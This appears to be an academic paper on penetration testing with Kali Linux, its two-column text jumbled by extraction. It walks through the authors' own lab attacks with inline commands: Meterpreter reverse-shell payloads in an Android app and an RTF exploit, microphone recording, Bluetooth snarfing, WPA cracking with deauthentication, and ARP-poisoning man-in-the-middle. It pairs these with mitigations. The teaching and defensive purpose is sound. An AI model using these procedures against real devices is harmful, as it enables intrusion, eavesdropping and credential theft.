Penetration Testing: Concepts, Attack Methods, and

Defense Strategies
Matthew Denis, Carlos Zena, Thaier Hayajneh
Computer Science Department
School of Engineering and Computing Sciences
New York Institute of Technology
Old Westbury, NY, USA
{mdenis02, czena, thayajne}@nyit.edu

Abstract— Penetration testing helps to secure networks, and points, attempting to break in (either virtually or for real), and
highlights the security issues. In this paper investigate different reporting back the findings. The main objective of penetration
aspects of penetration testing including tools, attack testing is to determine the security weaknesses. A penetration
methodologies, and defense strategies. More specifically, we test can also be used to: 1) test an organization's security policy
performed different penetration tests using a private networks, compliance; 2) test employee security awareness; and 3) test an
devices, and virtualized systems and tools. We predominately used organization's ability to respond to security incidents.
tools within the Kali Linux suite. The attacks we performed
included: smartphone penetration testing, hacking phones There are four typical types of penetration testing: external
Bluetooth, traffic sniffing, hacking WPA Protected Wifi, Man-in- testing, internal testing, blind testing, and double blind testing
the-Middle attack, spying (accessing a PC microphone), hacking [11]. An external test targets a company's externally visible
phones Bluetooth, and hacking remote PC via IP and open ports servers or devices, such as domain name servers (DNS), e-mail
using advanced port scanner. The results are then summarized servers, Web servers or firewalls. The objective in this case is to
and discussed. The paper also outlined the detailed steps and find out if an outside attacker can gain illegitimate access and
methods while conducting these attacks. what level of access can he get. An internal test simulates an
inside attack behind the firewall by an authorized user with
Keywords-penetration testing; Kali Linux; Metasploit; defense standard access privileges. A blind test simulates the actions and
strategies; Man-in-the-middle attack
procedures of a real attacker by strictly limiting the information
I. INTRODUCTION given to the person or team that is performing the test
beforehand. In double blind testing, it takes the blind test even
Penetration testing is a simulation of an attack to verify the further, in that only a few individuals within the organization
security of a system or environment to be analyzed. This test can would be aware that a test is being conducted.
be performed through physical means utilizing hardware, or
through social engineering. The objective of this test is to There are many different tools that can be used for
examine, under extreme circumstances, the behavior of systems, penetration testing. Several are available on the market that one
networks, or personnel devices, in order to identify their can download and use for free. Many of them are even able to
weaknesses and vulnerabilities. In terms of tools, there exist be customized; known as Open Source tools [2]. For example,
penetration testing tools which simply analyze a system, as well the testing tool Kali Linux has its own built-in penetration tools,
as ones which actually attack the system to find vulnerabilities. however, you can download and install additional tools to it.
Most of these programs are being developed for Linux, with only
One may assume that penetration testing is essentially a handful are being developed for Windows or Mac.
port scanning, which is not the case. To give an analogy, if a
network or host system is a house, port scanning would be There are also several penetration testing software that one
looking with binoculars at the doors and windows to find can purchase. Some of them cost as little of 10 dollars for their
potential entry points. A step above that would be vulnerability license, and others may cost thousands of dollars. Examples of
assessment/management, which in this case would be sending a these tools include:
home inspector to the house who has a focus on security; and
• Kali Linux – An Linux based OS containing a suite of
inspects different aspects of the house and gives critiques and
penetration tools.
suggestions as to things that could be improved upon the security
analysis. Penetration testing in this scenario would be getting • Metasploit – An advanced Framework used for pen-
someone to actually try to break into the house to truly find the testing that contains command-line and GUI interfaces.
security faults and weak points of the house.
• Wireshark – A protocol analyzer with a GUI.
Penetration Testing can be automated with software
applications, or it can be performed manually. Either way the • w3af – A web application attack and audit framework.
process includes gathering information about the target system • John The Ripper – A password cracker.
before the test (reconnaissance), identifying possible entry
 • Nessus – A very robust vulnerability identifier. • It is FHS complaint, i.e. it adheres to the Filesystem
Hierarchy Standard, allowing Linux users to easily
• Nmap – A network mapper, as the name suggest, that locate supported files, libraries, binaries, etc.
aids in understanding the characteristics of any target
network. • It supports a wide range of wireless devices
• Dradis – An open source framework that helps with • It has the latest injection patches included
maintaining the information that can be shared among
the participants of a pen-test. • It was developed in a secure environment made by a
small group of individuals
• BeEF – BeEF is short for “Browser Exploitation
Framework”, and focuses on web browsers. • Contains GPG signed packages and repositories

There are a variety of penetration testing tools available • Has Multi-language support
with some being customizable to improve their productivity. The It is common to refer to Kali Linux as a “Platform” as it is
use of each tool depends on the environment or network to be required to use a virtual machine to install this software to test
tested. These tools have specific objectives with manuals and its built-in tools. Kali is actually installed in the virtual machine
guidance on how to use them as well as videos on YouTube. One as environment to find vulnerabilities or constraints in the
can easily find quite a number of samples to follow and GUI system that one wants to analyze. For our test, we used Kali
guides to perform a penetration test without being an expert in Linux as a virtual machine in VMware. On the other hand, Kali
the field. One must understand that a permission is needed to do can be installed in a computer as a main operating system (OS).
a penetration test on an outside system or network. However, The poor GUI (though it has been improved with the years)
one can also create as many virtual machines at his own system make the OS very particular and not attractive to everyone.
and recreate scenarios to test.
In this section we describe several penetration attacks and
The purpose of this paper is to explain the use of and share tests that we conducted in this paper. All these attacks are
some concepts for better understanding penetration testing. In performed using our private networks, devices, and virtualized
our explanation of penetration testing we use the most common, systems.
simple and general concepts to make it clear and easy for readers
with different background to use and understand the tools. In A. Smartphone Penetration Testing
particular, this paper presents different penetration tests using a In this section we explain how to remotely take control over
private networks, devices, and virtualized systems and tools. We an android device (an LG G2x running Android Gingerbread),
predominately used tools within the Kali Linux suite. The using Kali Linux. We created a deployable application using
attacks we performed included: smartphone penetration testing, Metasploit and kali Linux. Firstly, we open a terminal in Kali
hacking phones Bluetooth, traffic sniffing, hacking WPA Linux and entered the command ~# msfpayload
Protected Wifi, Man-in-the-Middle attack, spying (accessing a android/meterpreter/reverse_ tcp LHOST=our IP address
PC microphone), hacking phones Bluetooth, and hacking remote LPORT=anyport(8080 or 4444) R > evilapp.apk [19]. From
PC via IP and open ports using advanced port scanner. The there the evilapp.apk application was generated in the home
results are then summarized and discussed. folder and we loaded up Metasploit and entered the commands:
The remaining sections of this paper are organized as use exploit/multi/handler, and then set payload android/
follows. Section 2 discusses the details of the attacks and tests meterpreter/reverse_tcp. We then set the ihost as our intended IP
that are performed in this paper. The mitigation and defense address, and entered set lport 8080. This makes the console to
strategies are discussed in Section 3. Section 4 presents our start listening to the IP address at port 8080. Then we installed
results and discussion and finally Section 5 concludes the paper. the evil.apk on the target device. With the device connected to
the internet we opened the app and can see the connected device
II. ATTACKS AND TESTS in console terminal. At this posint we have full access to the
device from the terminal and we can: retrieve contact
An efficient penetration tool which we utilized in this paper information; take a picture from the device’s camera; stream
is Kali Linux. This tool is an operating system built for hacking sound from microphone; retrieve all messages; or access to the
and penetrating systems. Building your own hacking tool to device file manager.
compromise or attack systems is time consuming and quite
arduous and tedious. Now a days, existing tools like Kali Linux B. Hacking Phone Bluetooth
facilitates this task, anyone can download as with any other In this section we describe how to hack phone’s Bluetooth.
application, and comes with a whole built-in suite of penetration Again we used a LG G2x running Android Gingerbread, a HP
and exploitation tools. Kali is an open-source Linux distribution Envy17t Laptop which had Bluetooth, and a virtualized Kali
downloadable from (www.kali.org) for free. It can run on many Linux in VMware. This method can also be used to hack an
different platforms; even on law-resource devices such as iPhone or Windows Phone’s Bluetooth. We started by loading
raspberry pi. Some notable features of Kali Linux are: up Bluesnarfer in Kali which is a Bluetooth bluesnarfing Utility.
• It contains over 600 penetration testing tools We started by opening a terminal and configured rfcomm, then
pinged to find potential Bluetooth enabled devices, using the
• It is completely customizable l2ping < victim mac addr > Command. From there we browsed
the victims for rfcomm channels to connect to the phone using
the command sdptool browse –tree –l2cap < mac addr >. With We started by logging to Kali Linux as root, and plugging
that Bluesnarfer was set up and now we have access to the the Alfa Network wireless card into the laptop. We then
bluetooth connected phones text. We also can make phone calls disconnected the system from all wireless networks. We opened
by using the command bluebugger -m < victim’s name > -c 7 -a a terminal and entered airmon-ng, which listed the available
< mac addr > Dial < number > [20]. wireless cards that support monitor, and the Alfa card popped
up. We than used airmon-ng start followed by the interface name
C. Accessing a PC microphone of our wireless card. The monitor mode enabled message
In this section we describe how we used Kali Linux to showed up meaning the card has been placed into monitor mode.
effectively set up our test system as a “bug” for spying. We We then entered airodump-ng followed by the name of the new
started by looking for an exploit within windows 7 (the OS of monitor interface. That command listed all of the wireless
our test system). We found that Microsoft revealed that hackers networks in our area and useful details about them. Once we
had found a vulnerability in Microsoft Word and Office Web located our network we pressed Ctrl + C to stop the process and
apps (MS14-017 – Critical) that could allow remote code noted the channel and BSSID of our network. We then entered
execution [22]. From there we booted Kali and went to airodump-ng -c [using our channel] --bssid [our bssid] -w
Metasploit and loaded in the exploit with the command msf >use /root/Desktop/ [our monitor interface]. The –w and file path
exploit/ windows/fileformat/ms14_017_rtf [21]. Through command identifies the place where airodump will save any
entering “info” and “show options” we saw that the option we intercepted 4-way handshakes, which are necessary to crack the
needed to fill was the FILENAME, and also that exploit works password [17]. In our case we saved it to our desktop and
only on Office 2010, which our test system had. We set the airodump only monitored our network. We then made another
FILENAME to “testfile.rtf” and the payload to place within the device to connect to that network, forcing a four-way handshake
file, using meterpreter; which allowed us to set up a linux to be sent which we needed to capture in order to crack the
terminal on the victim's computer where many basic linux password. To assure that we capture the four-way handshake, we
commands can be used. We did this with the command msf > set also used a feature of aicrack-ng, called aireplay-ng to forcibly
PAYLOAD windows/ meterpreter/reverse tcp. Next, we set the temporally dis-authenticate the system (deauth). By doing this it
LHOST, which is the IP of our attacking system, so that the made the machine think that it has to reconnect with the network,
payload could call back when it is executed on the test machine. causing another four-way handshake. To do this there has to be
Next we entered “exploit”, which created a word file named another device also connected to the network, whihch we
“testfile”, and then established a multi-handler to receive the connected and watched the airodump-ng and waited for a client
connection back to attack our system. This is done with the to show up. Once it appeared, we opened a second terminal and
commands msf > use exploit/multi/handler and msf > set entered the command: aireplay-ng –0 2 –a [our router bssid] –c
PAYLOAD windows/meterpreter/ reverse_tcp, then we set the [our second device client bssid] followed by our monitor
LHOST to the IP of the attacking System [21]. With the interface. Afterwards monitored aireplay-ng sent the packets and
malicious file created, we sent it as an attachment to an email in the WPA handshake messages pop up, i.e. handshake was
the test machine. Once executed on the test machine, we had a captured. From there we focused on the .cap file that we
meterpreter session with that computer. From there we had many captured. We opened another terminal, and entered aircrack-ng
options, but we chose to see if we could enable the microphone -a2 -b [our router bssid] -w [the path to our wordlist]
on the laptop and record sounds. Metasploit has a Ruby script, /root/Desktop /*.cap [17]. This launched Aircrack into the
which enables the microphone on the target machine, and process of cracking the password. We left this process running
records all nearby sounds and posssibly conversations. We did on the system for a few days, but it could not crack the password.
this by entering meterpreter > run sound_recorder - l /root [21]. We then scaled down the password to something really simple
This started the microphone on the test machine and set it to store and short just for proof of concept, and found and used a bigger
the recorded sounds in a file in the root directory, which could word list and left it running for another few hours, and it was
be heard by simply opening the stored file on the system. eventually able to get the password.
D. Traffic Sniffing It is also worth mentioning that wireless networks are also
As for sniffing the traffic, an efficient tool within kali Linux vulnerable to attacks that cannot be prevented using
that can accomplish this is Wireshark which is the world’s cryptographic protocols, such as: packet dropping [25, 26],
foremost network protocol analyzer. We used it to sniff the jamming [27], wormholes [28, 29] and localization [30, 31].
traffic on our network. The “gksudo” command opens F. Man-in-the-Middle Attack
Wireshark in Kali Linux [23]. From there we just selected
“interface list”, selected our network, and clicked start, which A man-in-the-middle Attack (MITM) is one of the simplest,
allowed us to see all the packets traversing the network. but also essential steps to gaining control over a network. Once
an attacker has performed MITM attack on a network, he will be
E. Hacking WPA Protected Wifi able to perform a number of other side attacks. This includes:
Hacking WPA and WPA2 networks is one of the attacks that intercepting emails, logins, chat messages, cutting a victim’s
Kali Linux is most popular for. In this test we attempted to hack internet connection; and many others. In this section we will
WPA Protected Wifi with the use of Kali Linux, Aircrack-ng, describe MITM attack that we performed using Kali Linux.
and an Alfa Network AWUS036H 802.11 b/g Long-Range USB We started Kali Linux, logged in as a root user, and entered
Adapter, and a word list to attempt to crack the passphrase. We the command echo 1 > /proc/sys/ net/ ipv4/ip forward to enabled
performed this test on a wireless network that we set up. IP forwarding, which is required so that the victim device
maintains connection while we are ARP poison it [18]. Ettercap permissions before installing. Google filters out all apps that are
does not come ready to work by default so we needed to make placed on the Play Store, however; there are still some
some necessary edits. We opened a terminal and entered leafpad application that contain malicious code that may get through.
/etc/ettercap/etter .conf. For the text that popped up we changed Also if a phone was stolen and used by a hacker, even a phone
the “ec_uid” and “ec_gid” values to zero and also replaced the with a passcode on it can have its information retrieved in similar
number 65534 with 0’s. We then searched for the phrase ways to the way performed and described. For this reason we
“itables”, and uncommented two lines by removing the # would recommended those whose realize their phone been
symbols. Afterwards we opened a terminal and started Ettercap- stolen to quickly (in the case of android phones) go to
gtk and clicked Sniff in the toolbar and selected Unified “https://www.google.com/ android /devicemanager?u=0” on a
Sniffing, then selected the interface we wanted. Now with computer or table, login in to their google account, from which
Ettercap loaded into attack mode, we clicked on Hosts and select they could be able to delete all the information on their device,
Scan for host. We waited till we observed “hosts added to the making it impossible, or harder to retrieve their information.
host list…” in the command box. We viewed the host list and
selected the IP Address of our router (192.168.1.1), and made it B. Hacking Phone Bluetooth Mitigation
Target 1 and then selected the IP of our test machine and clicked One of the most effective methods to protect your phone (or
Add to Target 2. We then clicked Mitm on the toolbar and table) from attackers to gain access through Bluetooth is to
selected ARP poisoning. Ettercap then ARP poisoned our test simply turn off Bluetooth on these device. Most people do not
machine and router. From there the test machine was able use any Bluetooth related features in their devices and would not
connect to the internet without knowing that there was attacker lose any functionally having Bluetooth perpetually off. For
between it and the router. From there it was possible to use tools people who do often use Bluetooth on their devices, we would
such as URLsnarf and SSLstrip to sniff out internet traffic suggest that they only turn on the Bluetooth when needed. Doing
information, or use etterfilters to disconnect machines internet. so needlessly exposes them to Bluetooth threats and attacks like
the one we performed and described.
G. Hacking remote Access PC
In this section we describe how to hack a remote computer C. Mitigation Strategies for Microphone Access
through IP and open ports. The steps to perform this attack An effective and simple method to prevent this type of attack
included: is to make sure you don’t open any unsolicited emails, and
1. Confirming the computer or website you want hack especially don’t click on any links or files with unsolicited
emails. That is how we are able to place the command and
2. Finding out their IP address control code onto the test system. We just made a simple email
3. Making sure their IP address is online called the file “testfile”, but an actually attacker on the internet
4. Scanning for open ports would use things such as social engineering to make the email
extreme appealing and even make it looks like an official email
5. Gaining access to that machine through open ports
for well-known companies, with this such as your name and
6. Brute forcing username and password information other personal information they were able to gleam. We would
For this test we created a simple website using html and also recommend using an email client such as Gmail, instead
made it accessible to the devices on the same network (the attack ones such as Yahoo Mail, Aim Mail, or Hot Mail. We found that
and test machines). To get the IP of the test machine we pinged Gmail allows for the minimum mount to unsolicited emailed to
the site, and ensure we receive the replies, verifying it was enter the inbox, and this reduces chance that one may be clicked
online. Form there we used advanced port scanner to scan all the allowing for the type of attacked we performed.
open ports. We then used telnet to access the ports, using the
command telnet [here using the IP for the site residing on the test D. Mitigation Strategies for Traffic Sniffing
machine] [here using the desired port number]. From here we There is no effective method to completely prevent attackers
were prompted to enter login information. We attempted to brute from sniffing your network. Though there are things that can be
force it can then perform a number of attacks. done to make it harder for the attacker to sniff your network and
be able to gain useful information. For wireless networks, for
III. DEFENSE AND MITIGATION STRATAGIES example, one should keep the SSID hidden and only known to
Fighting against these tools is a challenge, however; the devices that are connected to the network. Also the use of
damage is less when you know your vulnerabilities and attempt encryption when doing any important online actions makes
to fix or patch them. The main vulnerability in a system is its sniffed traffic reveal no pertinent information. That calls for
own operating system (e.g. “Windows”), hence, it must always actions such as making the sites use HTTPS (Port 443) instead
be updated with all the patches to prevent intruders to gain of HTTP (80), and encryption in on for your email services.
access. In this section we outline Kali Linux attack mitigation E. Mitigation Strategies against Hacking Protected WiFi
strategies for the penetration tests that we performed.
There are quite a few ways and steps one can take to prevent
A. Smartphone Penetration Mitigation Strategies their wireless network from being hacked. This includes:
In our test using Kali Linux and Metasploit, we showed one 1. Use WPA2 (WPA2-AES) if available
way how to gain full access to an android device. To protect
2. By all means never use WEP for wireless security,
from this attack, one should check the application carefully
as it is totally insecure
before installing. For instance, thoroughly checking app
 3. Do not base your wireless password on any able to break, though only after we scaled down the password
dictionary words. and used a bigger word list).
4. Within your router settings, hide your SSID, the
name of the wireless network
5. Use the router feature which allows filtering where
you can specify the MAC addresses that are
allowed to connect.
F. Man-in-the-Middle Attack Mitigation
In terms of ways to protect oneself against man-in-the-
middle attacks like the one we performed with Kali and Ettercap,
there are a couple of methods:
1. ARP detection software – There are few ARP detection
programs and for Windows machine they require installing
special drivers for your wireless cards.
2. Static ARP entries – Here you type in a simple commands Figure 2: Attacks success rate
and your computer basically become unarpable. When an
attacker performs an ARP MITM attack, their computer sends When taking both charts into consideration, we think man-in-
an ARP packet to the victim’s machine telling it that his MAC the-middle attacks are the type of attack network administer
address is the router. The victim’s machine is fooled and starts should particularly be prepared to. Lack of OS harding and
sending its data to the attacker. However, when you enter a static missing patches were the highest weaknesses, both of which
ARP entry, you are telling your computer that the router’s mac may lead to successful MITM attacks. Observing how with
address is permanent and will not be changed, thus your relative ease we were able to perform it, advanced hackers may
computer ignores any phony ARP packets sent by the attacker. have no difficulties to exploit those weaknesses.
The same tools used to prevent attacks may also be used by
G. Malicious Remote Access Defense Strategy
others to gather data and compromise large size companies.
In our test we tried to exploit telnet a gain remote access. The Usually, medium and big size companies are exercising
protocol enables users to remotely connect to devices. However penetration testing to prevent outside and inside attacks that
with Telnet login information and commands are sent in clear would cost more than doing penetration test. A firewall, an
text and can be compromised. Due to this we recommended the antivirus or sensors that are all over the network may not
use of SSH instead for remote access as this gives you secure, prevent cyber attacks if they do not really know the weakness
encrypted connection to your remote devices. and vulnerabilities of their system or network [36]. Finally, it is
also critical for the security protocols to adopt lightweight
IV. RESULTS AND DISCUSION
cryptographic techniques or use security levels with different
ciphers’ complexity [32][33][34][35].
V. CONCLUSIONS
Penetration testing is an important subject that IT administrators
should be aware of. With the internet growing every day, the
computer security field has become a very challenging topic not
only for the companies but also for regular users. It is time to
realize that we are not secure just having an antivirus anymore.
Today there is more of a chance of you getting hacked than
getting mugged. Penetration tools have been getting a lot of
attention, since there are no limitations in their production.
Open source tools can be modified according individual needs.
Imagine a penetration tool to hack satellites and change
predictions for weather patterns, or maybe change the time, or
Figure 1: Causes of systems' weaknesses even worst to active nuclear weapons. Nowadays, using these
tools, we can hack medical devices, or even cars. This paper
The graph in Figure 1 shows the typical reasons and causes of detailed critical penetration testing attacks and discusses
networks or systems’ weaknesses and vulnerabilities, and their potential mitigation techniques.
percentages. The graph in Figure 2 shows the seven attacks we
performed, and whether they were successful or not. The Red REFERENCES
color indicates successful attacks, where Blue color indicates [1] Anley, C.; Heasman, J.; Lindner, F. and Richarte, G. The Shellcoder's
Handbook: Discovering and Exploiting Security Holes. 2007. Wiley.
unsuccessful attacks, and Orange means it was partially
successful (e.g. cracking WPA Wi-Fi security which we were
[2] St. Laurent, Andrew M. Understanding Open Source and Free Software byte.wonderhowto.com/how-to/hack-like-pro-spy-anyone-part-1-
Licensing. 2004. O'Reilly Media. hacking-computers-0156376/ (retrieved 1 December, 2015)
[3] Piscitello, David. “Your First Penetration Test”. WatchGuard [22] Security TechCenter. (2014, April 8). “Microsoft Security Bulletin MS14-
LiveSecurity. URL: 017 – Critical”. URL: https://technet.microsoft.com/en-
http://www.corecom.com/external/livesecurity/pentest.html (retrieved 5 us/library/security/MS14-017?f=255&MSPPError=-2147217396
December, 2015) (retrieved 4 December, 2015)
[4] OUSPG Glossary of Vulnerability Testing Terminology. URL: [23] Dalziel, Henry. (2013, August 17). “Wireshark basics 101: A simple
http://www.ee.oulu.fi/research/ouspg/sage/glossary/ (retrieved 5 concise tutorial for beginners”. URL: https:// www.concise
December, 2015) courses.com/security/wireshark-basics/ (retrieved 8 December, 2015)
[5] Kurtz, George and Chris Prosise. “Penetration Testing Exposed - Part 3 [24] Luka. “Hack Remote Computer Via Ip And Open Port”URL:
‘Audits, Assessments & Tests (Oh, My)’”. September 2000. Information http://kalilinuxfans.blogspot.com/2013/06/hack-remote-computer-via-ip-
Security Magazine. URL: and-open.html (retrieved 9 December, 2015)
http://www.infosecuritymag.com/articles/september00/features3.shtml [25] Hayajneh, T.; Krishnamurthy, P.; Tipper, D.; Kim, T. Detecting malicious
(retrieved 5 December, 2015) packet dropping in the presence of collisions and channel errors in
[6] Middleton, Bruce. Conducting Network Penetration and Espionage in a wireless ad hoc networks. In Proceedings of the IEEE International
Global Environment. 2014. Auerbach Publications. Conference on Communications, Dresden, Germany, 14–18 June 2009;
[7] Internet Security Systems. “Network and Host-based Vulnerability pp. 1–6.
Assessment”. URL: http://documents.iss.net/whitepapers/nva.pdf [26] Hayajneh, T.; Almashaqbeh, G.; Ullah, S. A Green Approach for Selfish
(retrieved 7 December, 2015) Misbehavior Detection in 802.11-Based Wireless Networks. Mobile
[8] Skoudis, Ed. Security 560: Network Penetration Testing & Ethical Netw. Appl. 2015, 20, 623–635.
Hacking. SANS Institute: 2009 [27] Panyim, K.; Hayajneh, T.; Krishnamurthy, P.; Tipper, D. On limited-
[9] Skoudis, Ed. Security 504: Hacker Techniques, Exploits & Incident range strategic/random jamming attacks in wireless ad hoc networks. In
Handling. SANS Institute: 2006 Proceedings of the IEEE 34th Conference on Local Computer Networks,
Zurich, Switzerland, 20–23 October 2009; pp. 922–929.
[10] Chen, H., Li, F. H. & Xiao, Y. (2011) Handbook of Security and
Networks. World Scientific Publishing Co. [28] Hayajneh, T.; Krishnamurthy, P.; Tipper, D.; Le, A. Secure neighborhood
creation in wireless ad hoc networks using hop count discrepancies.
[11] Weissman, C. (1993). Security penetration testing guideline. In Handbook Mobile Netw. Appl. 2012, 17, 415–430.
for the Computer Security Certification of Trusted Systems, Center for
Secure Information Technology, Naval Research Laboratory (NRL), US, [29] Hayajneh, T.; Krishnamurthy, P.; Tipper, D. Deworm: A simple protocol
1-66. to detect wormhole attacks in wireless ad hoc networks. In Proceedings of
the IEEE 3rd International Conference on Network and System Security,
[12] Granneman, Scott. Linux Phrasebook. Indianapolis, Ind.: Sams, 2006. Gold Coast, Australia, 19–21 October 2009; pp. 73–80.
Print.
[30] Hayajneh, T.; Doomun, R.; Krishnamurthy, P.; Tipper, D. Source—
[13] Research, P. (2013, December 27). Mobile Technology Fact Sheet. Destination obfuscation in wireless ad hoc networks. Secur. Commun.
Retrieved 9 December, 2015, from Pew Research Internet Project: Netw. 2011, 4, 888–901.
http://www.pewinternet.org/fact-sheets/mobile-technology-fact-sheet/
[31] Doomun, R.; Hayajneh, T.; Krishnamurthy, P.; Tipper, D. Secloud:
[14] Labbe, Keith, Rowe, Neil & Fulp, J.D. (2006). A Methodology for
Source and destination seclusion using clouds for wireless ad hoc
Evaluation of Host Based Intrusion Prevention Systems and its
networks. In Proceedings of the IEEE Symposium on Computers and
Applications, 2006 IEEE Information Assurance Workshop
Communications, Sousse, Tunisia, 5–8 July 2009; pp. 361–367.
[15] Hardikar, A. (2013, 06). Penetration testing practice lab - vulnerable
[32] T. Hayajneh, S Ullah, BJ Mohd, K. Balagani, “An Enhanced WLAN
apps / systems. Retrieved from
Security System with FPGA Implementation for Multimedia
http://www.amanhardikar.com/mindmaps/Practice.html
Applications,” IEEE Systems Journal, 2015. doi:
[16] Weidman, Georgia, and Peter Van Eeckhoutte. Penetration Testing. No 10.1109/JSYST.2015.24247.
Starch Press Inc., 2014. Print.
[33] T. Hayajneh, R. Doomun, G. Al-Mashaqbeh, BJ Mohd “An energy-
[17] Encarnacion, Lewis. “How To Hack WPA/WPA2 Wi-Fi With Kali efficient and security aware route selection protocol for wireless sensor
Linux & Aircrack-ng” URL: networks,” Security and Communication Networks, John Wiley, Vol. 7,
http://lewiscomputerhowto.blogspot.com/2014/06/how-to-hack- No. 11, pp 2015-2038, 2014. DOI: 10.1002/sec.915
wpawpa2-wi-fi-with-kali.html (retrieved 15 November, 2015)
[34] Bassam J. Mohd, Thaier Hayajneh and Athanasios V.Vasilakos, A Survey
[18] Encarnacion, Lewis. “Perform A Man In The Middle Attack With Kali on Lightweight Block Ciphers for Low-Resource Devices: Comparative
Linux & Ettercap” URL: Study and Open Issues, Journal of Network and Computer Applications,
http://lewiscomputerhowto.blogspot.com/2014/03/perform-man-in- doi: 10.1016/j.jnca.2015.09.001
middle-attack-with-kali.html (retrieved 8 November, 2015
[35] Bassam J. Mohd, Thaier Hayajneh and Athanasios V.Vasilakos, A Survey
[19] Shahid, Mahammad. “Hack to Remotely Control Any Android Device on Lightweight Block Ciphers for Low-Resource Devices: Comparative
Using Kali Linux or Ubuntu” URL: Study and Open Issues, Journal of Network and Computer Applications,
http://www.letshacksomething.com/2015/01/hack-to-control-any- doi: 10.1016/j.jnca.2015.09.001.
android-device.html (retrieved 11 November, 2015)
[36] T. Hayajneh, BJ Mohd, A. Itradat, AN Quttoum “Performance and
[20] Root. (2014, August 17). “How To Hack Phones Bluetooth With Kali Information Security Evaluation with Firewalls,” International Journal of
Linux And Backtrack”.URL: http://hack.training/hack-phones-bluetooth- Security and Its Applications, SERSC, Vol. 7, No. 6, pp 355-372, 2013.
kali-linux-backtrack/ (retrieved 15 November, 2015) (DOI: 10.14257/ijsia.2013.7.6.36)
[21] Occupytheweb. (2014 April). “Hack Like a Pro: How to Spy on Anyone,
Part 1 (Hacking Computers)”. URL: http://null-